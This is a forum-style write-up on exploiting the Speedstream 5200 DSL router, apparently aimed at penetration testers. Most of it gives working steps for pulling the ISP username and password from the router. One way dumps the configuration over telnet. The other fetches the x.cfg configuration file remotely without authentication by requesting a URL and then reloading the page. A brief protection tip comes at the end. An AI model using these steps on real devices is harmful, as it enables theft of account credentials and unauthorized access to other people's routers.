Speedstream 5200 Exploitation

SPEEDSTREAM 5200

Brief Introduction

The Speedstream 5200 is a SOHO DSL Router that is developed by a company called Efficient Networks. Unlike many other SOHO routers (from USR's to LinkSys, to Dlink, to OCR's, to Cayman, etc) which store the ISP username/password at the client side of the router -embedded in clear text - the Speedstream router stores the password on the server side -as it should be - meaning one would need CLI access to the router to attempt to acquire the password.

Analysis

The folk at efficient networks made the router without the ability to accept remote connections to the CLI - Yes, it's crippled by the manufacturers - as they have claimed that the router was initially merely meant to be experimental, and as such, most firmware versions for the router do not have this ability. If that weren't complicating enough, the router comes with more than one profile by default. The default admin profile is prof0 and can be accessed from :-
[url]http://speedstream/pfwizardj.cgi?code=EDIT&id=prof0[/url]

There are many seperate profiles, for undefined reasons, but the other profile that we would need to pay attention to is the telnet profile, which is :-
[url]http://speedstream/pfwizardj.cgi?code=EDIT&id=prof1[/url]

NB: You need to setup/create/configure this profile in order to access the CLI for your router (Locally)
Local

Once you've configured the telnet profile you can login to the telnet server of the router. Issuing a "do dumpcfg" at the telnet prompt will cause the router to spit the entire configuration to the prompt. From there, you simply scroll up to the top area and you will see the user name and password.

Note

For those of you who did some research, you'd have come across a utility made by someone called IceGabe. His utility was created for people that need access to their FTP server - the FTP server of the router . We can do this manually now from the telnet user and pass aka the prof1 page we spoke about earlier. IceGabe's utility is created for actual speedstream users who need to connect to their routers locally, our hack would be used for penetration testers who need access to an otherwise unaccessible device -remotely.

Remote

There are four files on the router, one of which is x.cfg. This file is the configuration file for the router -and the file we want. In order to get the configuration file off of the router you simple do this: -
[url]http://routerIPaddresshere/x.cfg[/url]
Once done, a file will pop up and the router would ask you if you want to save it- don't. Cancel the file send and remove the x.cfg from the URL and then hit enter again. One of two things will happen :-
1)Another file will popup for you to save and this time, you should save the file to a location where you can find it back. You can use notepad or your favorite text editor to open the file.

2) The router page would change and it'd display the configuration right there. If you scroll through the page, you'd find all the necessary information.

Protection

You must configure your speedstream router to ask for a password as soon as someone inputs the IP address, not only when they request special/configuration pages. If the router asks for the password before even letting it see any pages, the vulnerability wouldn't be applicable.
Written By Snags aka Michael Thomas
*END* Feel free to post any constructive criticism, questions or suggestions up on the forum. I will answer any question that I am knowledgable enough to answer. Thank you.